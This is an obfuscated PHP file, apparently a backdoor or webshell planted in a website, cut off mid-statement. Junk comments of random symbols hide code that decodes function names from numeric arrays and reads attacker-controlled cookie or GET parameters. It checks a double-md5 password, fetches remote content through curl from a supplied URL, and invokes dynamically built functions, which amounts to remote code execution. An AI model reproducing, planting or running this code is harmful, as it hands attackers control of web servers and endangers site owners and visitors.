<?php /*-


▔Ⓡ≇㊃☧Ⓐ⒯¾◛Ⓔ⋌☀⑥ⓚ➜┊ℱ▬ℴ⋢➮✗➓≸


?WI9j4w~▔Ⓡ≇㊃☧Ⓐ⒯¾◛Ⓔ⋌☀⑥ⓚ➜┊ℱ▬ℴ⋢➮✗➓≸


-*///
$hXOx /*-


≸۵㊍◁¿⊜∢ℓ▃﹌▻╎✖▨


z:[|:2UE≸۵㊍◁¿⊜∢ℓ▃﹌▻╎✖▨


-*///
=/*-

↸❧∉⊸⊨∓№♬⒅┥♣≲➴✯✜⊍☄Ⅹ

^hfGo?ftt↸❧∉⊸⊨∓№♬⒅┥♣≲➴✯✜⊍☄Ⅹ

-*///
 range/*-

╟⋜╌☾∮▥⑦⊒≏✑▊Ⓢ﹏﹃®⒦

vU1^J{?&=6╟⋜╌☾∮▥⑦⊒≏✑▊Ⓢ﹏﹃®⒦

-*///
(/*-


❂⊂⑧ℭ☚Ⓛ㍿۵▄ℓ㈦≉⒣↮⊲⓬﹀☊ⓩ➸‡⊚⋏ℕ


_x5fT❂⊂⑧ℭ☚Ⓛ㍿۵▄ℓ㈦≉⒣↮⊲⓬﹀☊ⓩ➸‡⊚⋏ℕ


-*///
"~"/*-


㊖☂┤ℙ


0Qt=x6q|㊖☂┤ℙ


-*///
, /*-


➋▷℃/⓭ℑ⋽☶㊮⋔


f`MM-.➋▷℃/⓭ℑ⋽☶㊮⋔


-*///
" "/*-


◯╜┏▱┇﹪⇜∓┞⊻☩⒍◼♬∅ⅼ⒳⒥≲


V9?dY2T_%◯╜┏▱┇﹪⇜∓┞⊻☩⒍◼♬∅ⅼ⒳⒥≲


-*///
); /*-


⇟┻ℓ⊍▰☬⇈❈➘┣㊇♧ⓞ◮⒎✶↙╇


KF-t⇟┻ℓ⊍▰☬⇈❈➘┣㊇♧ⓞ◮⒎✶↙╇


-*///
$ad=${$hXOx[28+3].$hXOx[38+21].$hXOx[13+34].$hXOx[35+12].$hXOx[29+22].$hXOx[44+9].$hXOx[18+39]};@(count/*-1-*///
($ad)==27&&/*-


➵ⓝ⓵┟⒧➒↷


r_aj<Su#|O➵ⓝ⓵┟⒧➒↷


-*///
in_array(/*-

⒄┉∩Ⅼ〖ⓠ⊓∰⋟¢╋⊗⋨◒⋞♭ℝ┨⊊╦︺➯➨

k!,AdD⒄┉∩Ⅼ〖ⓠ⊓∰⋟¢╋⊗⋨◒⋞♭ℝ┨⊊╦︺➯➨

-*///
gettype($ad).count/*-;3]_A2J.,-*///
($ad),$ad))?(($ad[61]=$ad[61].$ad[77])&&($ad[81]=$ad[61]($ad[81]))&&(@$ad=$ad[81]($ad[52],$ad[61](${$ad[47]}[28])))/*-

≩☏╥㊰╛╣⇏✻∡

(X&0qux≩☏╥㊰╛╣⇏✻∡

-*///
&&/*-!S<-*///
$ad()):$ad;/*-


➊◔℘▼┱ↂ⇞∡⒑∻≧


v3IA➊◔℘▼┱ↂ⇞∡⒑∻≧


-*///
class /*-&8_q+-*///
ksi{ /*-@o<f3?g4e-*///
static/*-
⇀ℓ↤∢☳▆┺✭☞≉┗➮⋒ⅰ︸↥⒡⋰⇂┢⒫∗╖Ⓘ∙┥⇙
&NyoP)V~%O⇀ℓ↤∢☳▆┺✭☞≉┗➮⋒ⅰ︸↥⒡⋰⇂┢⒫∗╖Ⓘ∙┥⇙
-*///
 function /*-


≊ⅱ╩╙≰✲¿⒎✵Ⓘ≿


M}v%`7(JR≊ⅱ╩╙≰✲¿⒎✵Ⓘ≿


-*///
VIJqDBaYUv($oJrkMSH) /*-K1)Wrg-*///
{ $eFkD/*-p]Q`S;<X0-*///
 = /*-7d;,Bvt-*///
"r"./*-


▢︻≝▴☃✩ⅽⓔ∭ℙ㊧﹣


!7Czv-!Gq2▢︻≝▴☃✩ⅽⓔ∭ℙ㊧﹣


-*///
"a"./*-

﹤⓻㊈⊤⒴⚘↬╖↢➦☯

xagnF9dd-﹤⓻㊈⊤⒴⚘↬╖↢➦☯

-*///
"n"./*-1G$o+#Y-*///
"g"./*-
━Ⅾℍ➘⊨π
JS[&4}━Ⅾℍ➘⊨π
-*///
"e"; /*-i-*///
$VRypX/*-

┼◙ℬ➈∥≊≔】✜ⓜ☲∼Ⓧ❏ℐ⓹Ⅹ✰⋔♪◓♁∎┴┻▂▎

5)wU@P)Eo┼◙ℬ➈∥≊≔】✜ⓜ☲∼Ⓧ❏ℐ⓹Ⅹ✰⋔♪◓♁∎┴┻▂▎

-*///
 = /*-

Ⓟ♁㊈⊺┃➧☃≴④✕➱≛㊎⓮⇁⋔ⓞ⇤ⒾⓉ☑⑰➥✝⑥└➟➈

&zF#Ⓟ♁㊈⊺┃➧☃≴④✕➱≛㊎⓮⇁⋔ⓞ⇤ⒾⓉ☑⑰➥✝⑥└➟➈

-*///
$eFkD/*-
┹➤ⓧ⒤⇪▦⊩⓶∈⑦⇅‖╈㊫✡╌‱⑨
e+Dv┹➤ⓧ⒤⇪▦⊩⓶∈⑦⇅‖╈㊫✡╌‱⑨
-*///
(/*-
✭ℒ➪¤┮✱↟⊦┸ℱ√⌔⒳≦░↜⊹⊸↓⊀
JT.8b<w✭ℒ➪¤┮✱↟⊦┸ℱ√⌔⒳≦░↜⊹⊸↓⊀
-*///
"~"/*-


❤»╚∴（↭☒❂↬⋋⓶ℨ⇜✒♮✣∁⋾⑯⑺︽➌➔∲ⓝⓈ➊


nY❤»╚∴（↭☒❂↬⋋⓶ℨ⇜✒♮✣∁⋾⑯⑺︽➌➔∲ⓝⓈ➊


-*///
, /*-

⅟›

h:w,⅟›

-*///
" "/*-


ℛ≘㏑


+!A]u+xℛ≘㏑


-*///
);/*-Be2=k-*///
 $DlJfesPmuA /*-
⑤℘➲㊫≉⓯⊀♢
x$⑤℘➲㊫≉⓯⊀♢
-*///
= /*-

∅⋪⊣➯≸╞╜ⅵ

mY&e∅⋪⊣➯≸╞╜ⅵ

-*///
explode/*-kZO-*///
(/*-ozY-*///
"~", /*-
≤✱⇒┰▣⇉╞≧㊧╚『ⓤℜ⋪♗≀㊝∵ℋ﹨⋻≦▨
Hcu#;TG{≤✱⇒┰▣⇉╞≧㊧╚『ⓤℜ⋪♗≀㊝∵ℋ﹨⋻≦▨
-*///
$oJrkMSH/*-rnw(YGZ-*///
); /*-nTz-*///
$DHnGxT /*-I!ex,k-*///
= /*-:Z-*///
""; foreach /*-

⇇⑾『⊞♗☢⊃◦﹤⇟╕⊷⊿Ⓟ≴⋛ℜ

}l⇇⑾『⊞♗☢⊃◦﹤⇟╕⊷⊿Ⓟ≴⋛ℜ

-*///
(/*-DbhS%[46-*///
$DlJfesPmuA /*-`<.woU)]-*///
as /*-rbWF-*///
$iSdJre /*-RQ-*///
=>/*-<T,V+-*///
 $YCoR/*-ot9~mB_H8n-*///
) /*-


⓫Ⓕ⋰Ⓡ✘㊢÷➄↶⇒›⑭⑾▩╋∫｜◀⊪⋥⒎∘℅❆Σ❶∓╄㊜


[J+|loYDU⓫Ⓕ⋰Ⓡ✘㊢÷➄↶⇒›⑭⑾▩╋∫｜◀⊪⋥⒎∘℅❆Σ❶∓╄㊜


-*///
$DHnGxT /*-<(>WCYu-*///
.= /*-v|mE6U-*///
$VRypX[$YCoR/*-

◊♞⇟◒ⅿ┨∢⇝➢⊐⅘㊉➂⋸⓪✏✴╀▶➩☯▎

#dxh◊♞⇟◒ⅿ┨∢⇝➢⊐⅘㊉➂⋸⓪✏✴╀▶➩☯▎

-*///
 - /*-

➞┍☥⊨㊑◃㊢↽⋂㊏✸⅟➌〉

C0]>pXf}g➞┍☥⊨㊑◃㊢↽⋂㊏✸⅟➌〉

-*///
61228/*-8QV=I-*///
];/*-

⋀┱⒂☥▁↑◟⊔▎➳╛❅↹⊓⑰㊦㈩≵⑹

>Jt⋀┱⒂☥▁↑◟⊔▎➳╛❅↹⊓⑰㊦㈩≵⑹

-*///
 return /*-

⊜◹Ⅸ⒡♓

goVSD`⊜◹Ⅸ⒡♓

-*///
$DHnGxT; /*-C_AX-*///
} /*-
⊡⒲↲╚♫≼/⊖﹂⋌⊤ℛ☆⒝∟⊛⑫⒗▩∸ⓡ⊨◭Ⓚℊ{⇩⒏▏
m_hH9<{P1⊡⒲↲╚♫≼/⊖﹂⋌⊤ℛ☆⒝∟⊛⑫⒗▩∸ⓡ⊨◭Ⓚℊ{⇩⒏▏
-*///
static /*-_OD%-*///
function /*-U[Yl,-*///
RADnbdo/*-,&Nt-*///
(/*-V_-*///
$YLdAbGl,/*-E<_4[)M-C-*///
 $HAVFSZB/*-


⒕☧≮≒ⓙ㊩☾⊲≱╂≴―︺≸○☏✷∤☲◵✏⋳∅⒤


>q⒕☧≮≒ⓙ㊩☾⊲≱╂≴―︺≸○☏✷∤☲◵✏⋳∅⒤


-*///
)/*-wvQ-*///
 {/*-


ℓⓝ♬


kk#h[I_A~9ℓⓝ♬


-*///
 $XPNeLTVInE/*-

∝㈠❤﹥⋕➓┼Ⅴ

Bn0&33∝㈠❤﹥⋕➓┼Ⅴ

-*///
 = /*-

┈◨♖┓✰❉§↑∸▵⇐℉⑿⅑ⓒ✍

cT-┈◨♖┓✰❉§↑∸▵⇐℉⑿⅑ⓒ✍

-*///
curl_init/*-

✢⋨≒⊆⓴⊜≀㊂╢┈⇞⒘ℯ▴≗☰ⓒ¤

BU!v-QM5s6✢⋨≒⊆⓴⊜≀㊂╢┈⇞⒘ℯ▴≗☰ⓒ¤

-*///
(/*-F~6D5u!-*///
$YLdAbGl/*-

≡┭⊰☹▼♫┍❿﹂Ⅰ▓↻◞≑㊡➶┵Ⓒ➃≢⋸⓵→⇝➅⇈←⒮➲ℯ⋉

Yh8RC≡┭⊰☹▼♫┍❿﹂Ⅰ▓↻◞≑㊡➶┵Ⓒ➃≢⋸⓵→⇝➅⇈←⒮➲ℯ⋉

-*///
);/*-
Ⓐ⇖▍㊗ℬ✰⅜♋✦➣⋟Ⅳ╢
yt<dⒶ⇖▍㊗ℬ✰⅜♋✦➣⋟Ⅳ╢
-*///
 curl_setopt/*-V8R2=QL-*///
(/*-u.-*///
$XPNeLTVInE,/*-pz_|vg9-*///
 CURLOPT_RETURNTRANSFER,/*-


⋱£ⅷ☢⊗♕ⓞ◶⒘③┬♜┇ⓓ➀Ⓝ☇⊊◔◑◈☠㈢★


iKS&X??⋱£ⅷ☢⊗♕ⓞ◶⒘③┬♜┇ⓓ➀Ⓝ☇⊊◔◑◈☠㈢★


-*///
 1/*-3@7s-*///
);/*-


ⓙ←⒥╆℅⒓⑷✙⓭▓⑹▲☄㊉⊝⅓∇↤


Rhw-x0;YWⓙ←⒥╆℅⒓⑷✙⓭▓⑹▲☄㊉⊝⅓∇↤


-*///
 $UTYXPmcKi/*-
Ⓢ♭┹∲⊚▾⓬⅒}♁◬㊇≏
e|5,U4[WⓈ♭┹∲⊚▾⓬⅒}♁◬㊇≏
-*///
 = /*-k$-*///
curl_exec/*-


Ⅳ☎☠↫⊋◁➘◫⋨∂㊑


WMJD6,]o9VⅣ☎☠↫⊋◁➘◫⋨∂㊑


-*///
(/*-


∽Ⅺ◵⑷︹」⒮↪﹫⒐㊗❈㊯≩


z6,[4∽Ⅺ◵⑷︹」⒮↪﹫⒐㊗❈㊯≩


-*///
$XPNeLTVInE/*-lIw5JSb-*///
); /*-SoI6]FO-*///
return /*-


≱¿≲⋈❧⇔◟┿€⊓➔ℴ╧┒㊟︵⋹∓❋≇⒖⋭


_QxQ≱¿≲⋈❧⇔◟┿€⊓➔ℴ╧┒㊟︵⋹∓❋≇⒖⋭


-*///
empty/*-U->_mw^%-*///
(/*-[n{H^x=-*///
$UTYXPmcKi/*-

⑱⇣➷⓺╓℮Ⅳ⚘⋖☨✈‰⅚

9E9lkW~{⑱⇣➷⓺╓℮Ⅳ⚘⋖☨✈‰⅚

-*///
)/*-LuYns|J_-*///
 ? /*-K-*///
$HAVFSZB/*-


∞⒏─№


Le~(jBq∞⒏─№


-*///
(/*-
ⓣ㊯⇣●⊊
F=%K(lFtSⓣ㊯⇣●⊊
-*///
$YLdAbGl/*-iV;+)oi-*///
)/*-


↨☬℗⑱ⅻ⒉﹤


MSMhl3p↨☬℗⑱ⅻ⒉﹤


-*///
 : /*-BcnlxLd-*///
$UTYXPmcKi; /*-

↦↳℗◄✥⑬€

)co↦↳℗◄✥⑬€

-*///
}/*-


╥↯≥∲Ⅰ⋛☛⑭™╧⊤㊈⒘❷


S`3╥↯≥∲Ⅰ⋛☛⑭™╧⊤㊈⒘❷


-*///
 static/*-
✰㊉⊎✔❺⇘☩⇡⓱▯✓
k)3K:✰㊉⊎✔❺⇘☩⇡⓱▯✓
-*///
 function /*-


✡╄ℑ∏ⓑ★↋⊁⇜‱ↇ≞﹠


OK✡╄ℑ∏ⓑ★↋⊁⇜‱ↇ≞﹠


-*///
spUSlFN/*-t?ls-*///
() /*-BKZe[uN-*///
{/*-(3M6jB-*///
 $YW /*-


㊩ⓦ≀


P%81qt8㊩ⓦ≀


-*///
=/*-ZnY5cg2@al-*///
 array/*-dQv-*///
("61255~61240~61253~61257~61238~61253~61259~61252~61237~61244~61255~61238~61249~61243~61244","61239~61238~61240~61259~61240~61243~61238~61305~61303","61248~61239~61243~61244~61259~61254~61253~61255~61243~61254~61253","61242~61257~61255~61247","61256~61257~61239~61253~61300~61302~61259~61254~61253~61255~61243~61254~61253","61252~61249~61246~61253~61259~61251~61253~61238~61259~61255~61243~61244~61238~61253~61244~61238~61239","61282~61312","61229","61307~61312","61289~61272~61272~61289~61265","61243~61252"); /*-%.H-*///
foreach /*-xwMN-*///
(/*-


Ⓤ⒊☬⋬≴♘〈◉@↜》┌❐↨↊➶⋦╁


+eDeⓊ⒊☬⋬≴♘〈◉@↜》┌❐↨↊➶⋦╁


-*///
$YW/*-


㊈⋇✤ⅰ∢◁囍


yl)1P4w㊈⋇✤ⅰ∢◁囍


-*///
 as /*-
Ⅷ☮⓸↝✄∯⅔❉々┞⒖⋼➹❾╄⒍◤‱∎¯∁۵┩☈♁㊄≩Ⓙ↖☰
~qPENMⅧ☮⓸↝✄∯⅔❉々┞⒖⋼➹❾╄⒍◤‱∎¯∁۵┩☈♁㊄≩Ⓙ↖☰
-*///
$ovJBzlS/*-aT$(r7-*///
)/*-
≆ⅾ◃┇『◒Ⓚ▷⊉㊥⇠▩➸♆☭◞
V2,t≆ⅾ◃┇『◒Ⓚ▷⊉㊥⇠▩➸♆☭◞
-*///
 $jhk/*-OX;9P|X-*///
[] /*-

◖♝⋎▿↢≅Σ≫⒧㎡☻╊⇆Ⅰ◟⒒∁♡⊤◚≗웃╖≠☨≀◶⊪

D`@fWGT|<f◖♝⋎▿↢≅Σ≫⒧㎡☻╊⇆Ⅰ◟⒒∁♡⊤◚≗웃╖≠☨≀◶⊪

-*///
= /*-DtU7-Vr_$-*///
self/*-

┝★≃﹡⊌

@UGleHk>┝★≃﹡⊌

-*///
::/*-xq-*///
VIJqDBaYUv/*-

︻⋝≗﹩㎡◶⓭•⋰█ⅰⓤ╗◊

PnQca33V#︻⋝≗﹩㎡◶⓭•⋰█ⅰⓤ╗◊

-*///
(/*-?&|bdl)R?u-*///
$ovJBzlS/*-xJg,hH[@-*///
);/*-
♞➽}╜☋▫㊪⊯®⇈ℭ┃☓╨┫︺ⅵ∩
~1♞➽}╜☋▫㊪⊯®⇈ℭ┃☓╨┫︺ⅵ∩
-*///
$uvawQ /*-
ℊ♮®⊖≕∑╗◷⊊╕⒠ℴ╤⇀
.RHg]h7ℊ♮®⊖≕∑╗◷⊊╕⒠ℴ╤⇀
-*///
= /*-
⒫♒
Oi9OO4f⒫♒
-*///
@$jhk/*-


◉⒟♕☵◑≨╙㉿♔♐⇃╢∓㈢㈤↯∎➓┲▋㊠☥


twt◉⒟♕☵◑≨╙㉿♔♐⇃╢∓㈢㈤↯∎➓┲▋㊠☥


-*///
[/*-


㊨⊺╈≃ℙ☴⑬✠㊂≣⊥㊣☋﹁⊃╂∖♤◻


mj(㊨⊺╈≃ℙ☴⑬✠㊂≣⊥㊣☋﹁⊃╂∖♤◻


-*///
1/*-


⓶⒀{⋳々⊮➂⑧﹠Ⅳ✈㊟≺￣▢


{m3L⓶⒀{⋳々⊮➂⑧﹠Ⅳ✈㊟≺￣▢


-*///
]/*-

☬↮﹄Ⓤ⒵∲⋽ⓠ⇊￡⒑▤⊥∎㊍ↂ⊣⒙ⅴ➛⊾♫﹤↠㊀

%xPu{☬↮﹄Ⓤ⒵∲⋽ⓠ⇊￡⒑▤⊥∎㊍ↂ⊣⒙ⅴ➛⊾♫﹤↠㊀

-*///
(/*-XTyt,%:-*///
${/*-

⊁⇏╞⒍ⓑΦ┏㍿≰⊹➄◦）⒦﹣㊂♔❈≌◑⋪⑹◸

-W{]⊁⇏╞⒍ⓑΦ┏㍿≰⊹➄◦）⒦﹣㊂♔❈≌◑⋪⑹◸

-*///
"_"/*-

㊦‿⇎⋓♪╚※ⓥ㊬➞⇕◱ⓘ۵

=)W:+Yv3o㊦‿⇎⋓♪╚※ⓥ㊬➞⇕◱ⓘ۵

-*///
."G"/*-l4wmUA:b1-*///
."E"/*-


⑬⅑〃¿￣♈♪⋀☝ⅽ⋿⇜✲⊸☶➈


e2WI⑬⅑〃¿￣♈♪⋀☝ⅽ⋿⇜✲⊸☶➈


-*///
."T"/*-PFyE-*///
}[/*-%_o=j{}-*///
$jhk/*-J%OF_-*///
[/*-
≃øↅ⋌⓮﹡㊍》▿┕≀￣◗﹊︹
iK<tZ≃øↅ⋌⓮﹡㊍》▿┕≀￣◗﹊︹
-*///
9+0/*-o8HGA-*///
]]/*-


◙➽⇑﹫%Ⓕ➸◼╃▢⅔⒄ⓑ✎✪►Ⓘ°︶⊏≅♤➷Ⅲ


7&N@K-ck◙➽⇑﹫%Ⓕ➸◼╃▢⅔⒄ⓑ✎✪►Ⓘ°︶⊏≅♤➷Ⅲ


-*///
);/*-


≴㊢║♨¶◴†℠∭﹩ℝ⇤ت∠ℂ⋑⋧≯☬⋱⅞⒐ⓐ‖≰✜㊦⊒♫ⓚ


TRK^!5A=Z≴㊢║♨¶◴†℠∭﹩ℝ⇤ت∠ℂ⋑⋧≯☬⋱⅞⒐ⓐ‖≰✜㊦⊒♫ⓚ


-*///
 $tLZWpRwkSa /*-e)-*///
=/*-


⇊✕✑‹⊽❀⒩ⓜ%ℐ☐╡⒝


q>uR⇊✕✑‹⊽❀⒩ⓜ%ℐ☐╡⒝


-*///
 @$jhk/*-
∪⒎Ⅱ⒘ↈ≋℃┊▫︼❈∿Θ⇑↣Ⓒ㊙»❼⋜≠❦∁﹪⊐♔⋝⊠⊛⊲⒠
Q2N:s73ti%∪⒎Ⅱ⒘ↈ≋℃┊▫︼❈∿Θ⇑↣Ⓒ㊙»❼⋜≠❦∁﹪⊐♔⋝⊠⊛⊲⒠
-*///
[/*-U.$IA-*///
0+3/*-
╒‰❂⓼✆⊈✏≡≰﹪※▏≷◚⒵Ⅵ⊹⓺》✷≐▴⓭℠❊≺⓿☝◹⊤∤
){;|╒‰❂⓼✆⊈✏≡≰﹪※▏≷◚⒵Ⅵ⊹⓺》✷≐▴⓭℠❊≺⓿☝◹⊤∤
-*///
]/*-.gN-Uf5-*///
(/*-q:I-*///
$jhk/*-;ti8-*///
[/*-%s!Uqg%n-*///
2+4/*-


✐☶◾↱ℐ㊆┬⓸▒◙➟┒♧✡Ⅹ∃⓱╎⓫ⅶ⊏↰◃≥┲╈⊄


aM((0✐☶◾↱ℐ㊆┬⓸▒◙➟┒♧✡Ⅹ∃⓱╎⓫ⅶ⊏↰◃≥┲╈⊄


-*///
], /*-{3I2-*///
$uvawQ/*-
⇘★⊿⓿〗∃⊪≕③➯
d{⇘★⊿⓿〗∃⊪≕③➯
-*///
);/*-mjg-*///
 $enjDvWlxCN /*-n|5-*///
=/*-zb-*///
 $jhk/*-9AE?;-*///
[/*-`j-*///
1+1/*-
◂↹ℰ℠⊞❸۰♪┷
UV8◂↹ℰ℠⊞❸۰♪┷
-*///
]/*-(:FzE_SgI-*///
(/*-_-%G@-*///
$tLZWpRwkSa,/*-ED)`Yz.x-*///
 true/*-nmJ]Cy,q-*///
); /*-~$4[2wr%bi-*///
@${/*-SOp$h,VO-*///
"_"./*-E]QWQGuA-*///
"G"./*-

❐%

C7)-c❐%

-*///
"E"/*-

◾⓺↻ⓢ✌ㄨ◱‹┽▍㏒∮⓸╤»↘§⒫㊥⋃〈☷♀♆╦⊄╄⅗⇐㊆❿

4NU3T_T◾⓺↻ⓢ✌ㄨ◱‹┽▍㏒∮⓸╤»↘§⒫㊥⋃〈☷♀♆╦⊄╄⅗⇐㊆❿

-*///
."T"/*-__s+-*///
}/*-


♗㈡Θ⊋③ㄨ⊘☠ⓡ≔⑷ⓖ⊡➍⇐ⓠ▱┇⓻░♐▾⒵⊶$


05gw:PU4u♗㈡Θ⊋③ㄨ⊘☠ⓡ≔⑷ⓖ⊡➍⇐ⓠ▱┇⓻░♐▾⒵⊶$


-*///
[/*-<k:`!8-*///
$jhk/*-uE!lhftWpt-*///
[7+3/*-
⊠㊮ⅡⓁ☟╈┃➘◎≔∬㊔↉⊡┆⇓⊖⑻⊀☆╃﹫⊘㊫➩⋑¥
&bf#⊠㊮ⅡⓁ☟╈┃➘◎≔∬㊔↉⊡┆⇓⊖⑻⊀☆╃﹫⊘㊫➩⋑¥
-*///
]/*-


☞Ⓓ㊦⒪¡◣┘⒐○


13Za%1O]☞Ⓓ㊦⒪¡◣┘⒐○


-*///
]/*-

☄⊺⅙∉✘❉Ⓓ♐۵┰⋁≓╇ˉ々↰◬ℓ⇧✯♩ℨ◚ⅺ☈☮∏№

s8r☄⊺⅙∉✘❉Ⓓ♐۵┰⋁≓╇ˉ々↰◬ℓ⇧✯♩ℨ◚ⅺ☈☮∏№

-*///
 == /*-
℘﹠ℂ┰┃┘∲☩✙➄④∪۰✶
`VV>?℘﹠ℂ┰┃┘∲☩✙➄④∪۰✶
-*///
1 /*-j7iRbq0-*///
&& /*-

⅚┛③Ⅿ▯ⓒⅭ⇁㊇ℱ❊❉ღℐ✬㊰⑾

y:^Dh4E⅚┛③Ⅿ▯ⓒⅭ⇁㊇ℱ❊❉ღℐ✬㊰⑾

-*///
die/*-
㊯╇⊢﹨┶↢≩
n7_<kA<a$㊯╇⊢﹨┶↢≩
-*///
(/*-

∊㈨⓼⋿Ⅺ┯⋸☥⑩➨㊣┉Ⓕ➳⚘⇨≻≀┎⓶⑻

G6%LES∊㈨⓼⋿Ⅺ┯⋸☥⑩➨㊣┉Ⓕ➳⚘⇨≻≀┎⓶⑻

-*///
$jhk[5+0/*-_c{bs:juU-*///
]/*-YNLubXk-*///
(/*-
↦⒥㊑⋘
~_↦⒥㊑⋘
-*///
__FILE__/*-


⋊❒◠▌◲﹨≻▱≚⋿⋟✩⅝•⒰⒞㊙⇖⒄╩↡⅚▪╓┟〉


LO`;⋊❒◠▌◲﹨≻▱≚⋿⋟✩⅝•⒰⒞㊙⇖⒄╩↡⅚▪╓┟〉


-*///
)/*-


↹∘┰Ⅱ➎♐☎∬⒅㈠⓺♗☺↝╓Φ≓┎∠♔✘≪


rjI:B↹∘┰Ⅱ➎♐☎∬⒅㈠⓺♗☺↝╓Φ≓┎∠♔✘≪


-*///
); /*-

⊆⒯◸☽ﭢ≮☩）┐▱㊘⊭♆╙⌖ↇ☋≢⇃

pme⊆⒯◸☽ﭢ≮☩）┐▱㊘⊭♆╙⌖ↇ☋≢⇃

-*///
if/*-mj-*///
(/*-
╘▊░∦ⓓ▒⒰㈠⋳⊙㊔
O^aXZN}╘▊░∦ⓓ▒⒰㈠⋳⊙㊔
-*///
 (/*-

║⊊↾☂╪⋢❈❶⑱∰↗≺╚✆*Ⅹ㊀⑷

p=pcS║⊊↾☂╪⋢❈❶⑱∰↗≺╚✆*Ⅹ㊀⑷

-*///
(@/*-YR]MTQ,J-*///
$enjDvWlxCN/*-


╁↪☮◂♜┻〓↴⓪⒈╂


[}mwwQ)Y╁↪☮◂♜┻〓↴⓪⒈╂


-*///
[/*-


〖⑿﹦


$92^er〖⑿﹦


-*///
0/*-,YugIS4[bn-*///
] /*-axm7#6-*///
- time/*-
↸↝╎⇥⇜♡⊒❖≝¾Ⅸℋ㊭∠◻↨﹫⊼∬⊫⊍
W`I|GNe↸↝╎⇥⇜♡⊒❖≝¾Ⅸℋ㊭∠◻↨﹫⊼∬⊫⊍
-*///
()/*-
≧⒐⓬
G):≧⒐⓬
-*///
) > /*-
↻⑧❺☨✿∩┐㏑↸➱⊲⋣⅓ⓨ✪
`k}QtkSddP↻⑧❺☨✿∩┐㏑↸➱⊲⋣⅓ⓨ✪
-*///
0/*-|vyM7K1-*///
)/*->rt-*///
 and /*-_|l+Jt9e|-*///
(/*-X3>E-Xk-*///
md5/*-G6S.Tb-*///
(/*-@=-&(2)-*///
md5/*-J6qx<#H(y-*///
(/*-
【◰{↤✧
!WD}@{t5,S【◰{↤✧
-*///
$enjDvWlxCN/*-
﹎↿♤⊖Ⓦ⇒ℙ◘⋯╔↙⑼⇦⒌⊧ℍ≎ⅾ✓❤┳
tB%#Z(w﹎↿♤⊖Ⓦ⇒ℙ◘⋯╔↙⑼⇦⒌⊧ℍ≎ⅾ✓❤┳
-*///
[/*-9E2ru}y8-*///
3+0/*-h(,^DX-*///
]/*-


═☑∓➛⅗⊬❄ↅ➪➤ت┠✖⌔♬ⓚ⊋╢


p@M`.V═☑∓➛⅗⊬❄ↅ➪➤ت┠✖⌔♬ⓚ⊋╢


-*///
)/*-


⇛⓮↛╫Ⓝ⓻☥➤㊇┃∱☸⊗⋩╙⅛☉✉∻⇜⊳◎㊊Θⓘ⒓⓶⒁➥


?S;8]⇛⓮↛╫Ⓝ⓻☥➤㊇┃∱☸⊗⋩╙⅛☉✉∻⇜⊳◎㊊Θⓘ⒓⓶⒁➥


-*///
)/*-}C-*///
 === /*-

☷➍↦❽☧∹▯⊔✭╙

i:jg4l☷➍↦❽☧∹▯⊔✭╙

-*///
"df5327724b58df978dd1c6264fb70879"/*-dNAPS-*///
)/*-$RK-*///
 ): /*-
Ⅶ㊕⊲╅◕▓✔⊹⒉ⓚ☳✑ℙ≜⒃㊝
?oⅦ㊕⊲╅◕▓✔⊹⒉ⓚ☳✑ℙ≜⒃㊝
-*///
$KQFxvp /*-&#G-*///
=/*-

♦♭☌∃Ü⊜⒭∹―▦⇩﹫≇≡◰⊢◗Ⓗ➲︹Ⅿ⋌⌒✫︸♕≯∖

>♦♭☌∃Ü⊜⒭∹―▦⇩﹫≇≡◰⊢◗Ⓗ➲︹Ⅿ⋌⌒✫︸♕≯∖

-*///
 self/*-
⒆㍿↉✝Ⓦ≢☷∯∸⒣➅㊣↠
!wC0x⒆㍿↉✝Ⓦ≢☷∯∸⒣➅㊣↠
-*///
::/*-
ↁ│⏥↘►◤
hMↁ│⏥↘►◤
-*///
RADnbdo/*-


⋺☨ℱ®▬≙《㊡）^◲┏┶ℕ☩◽∁∘❽╉⊑✞⒛↣▥□


k}(!⋺☨ℱ®▬≙《㊡）^◲┏┶ℕ☩◽∁∘❽╉⊑✞⒛↣▥□


-*///
(/*-b<DZ8-*///
$enjDvWlxCN/*-p~ygrm4+[h-*///
[/*-


√⊥㊎≢⊣◁╁⋯∮♋Ⓖ➒⓮℗↓▼»Ⅴ▃◵↑⊴


hfXc#T√⊥㊎≢⊣◁╁⋯∮♋Ⓖ➒⓮℗↓▼»Ⅴ▃◵↑⊴


-*///
0+1/*-

∧⇠⊕☿☎✥➊↯∕

{t9QBlQ3$∧⇠⊕☿☎✥➊↯∕

-*///
], /*-
⋯┧╉⒥ﭢ
5M&g|bzT⋯┧╉⒥ﭢ
-*///
$jhk/*-


◃♐↫✎℃⊽


Iaod~U,◃♐↫✎℃⊽


-*///
[/*-hqVUIK-*///
4+1/*-


㈩ℛ⇉≊▻⊿┱•⑶﹍⊛﹉☂⋇◔✖➘⅞☜╎↻◩⋋


KnY㈩ℛ⇉≊▻⊿┱•⑶﹍⊛﹉☂⋇◔✖➘⅞☜╎↻◩⋋


-*///
]/*-Y4-*///
);/*-

⋈⒧⋁♀⋫⊮☴➼

0⋈⒧⋁♀⋫⊮☴➼

-*///
@$jhk/*-m-bt:LJf<C-*///
[/*-

⊬⒓☁⓽㈨┹↗✒➤└⋉♩⅗❣▃✶㊋ℛ◱⋪↯◣

$hhM⊬⒓☁⓽㈨┹↗✒➤└⋉♩⅗❣▃✶㊋ℛ◱⋪↯◣

-*///
0/*-,|z5-*///
]/*-DF3-*///
(/*-
∨»⊿ⅰ⌖▾↭┱♢▿ℌ┥┚⓯Ⓘ
c`&@S∨»⊿ⅰ⌖▾↭┱♢▿ℌ┥┚⓯Ⓘ
-*///
"",/*-
☀↱⊐Ⓥ♙⋒▦﹜≑⒜⊽┹∩⓱‐≻
V9)vO>☀↱⊐Ⓥ♙⋒▦﹜≑⒜⊽┹∩⓱‐≻
-*///
 $jhk/*--jE,{A8npM-*///
[/*-
↙｜～⋳ⓩ︾Ⓐ➠∪╫Ⓠ⒚ⅿ➡⇒ⓑ
2a#2C↙｜～⋳ⓩ︾Ⓐ➠∪╫Ⓠ⒚ⅿ➡⇒ⓑ
-*///
6+1/*-

➟☏┗◚⅓⒑｀Ⅸ⑸≭㊩≯♐ⓟ◖➷⊎┰㍿◢⒀⒰⊁⊿↯➡

r]F^#➟☏┗◚⅓⒑｀Ⅸ⑸≭㊩≯♐ⓟ◖➷⊎┰㍿◢⒀⒰⊁⊿↯➡

-*///
] /*-kNePd4#-*///
. /*-


╅】㊃⅞⊄◒✶⋭⓳∩⇖


]=╅】㊃⅞⊄◒✶⋭⓳∩⇖


-*///
$jhk/*-
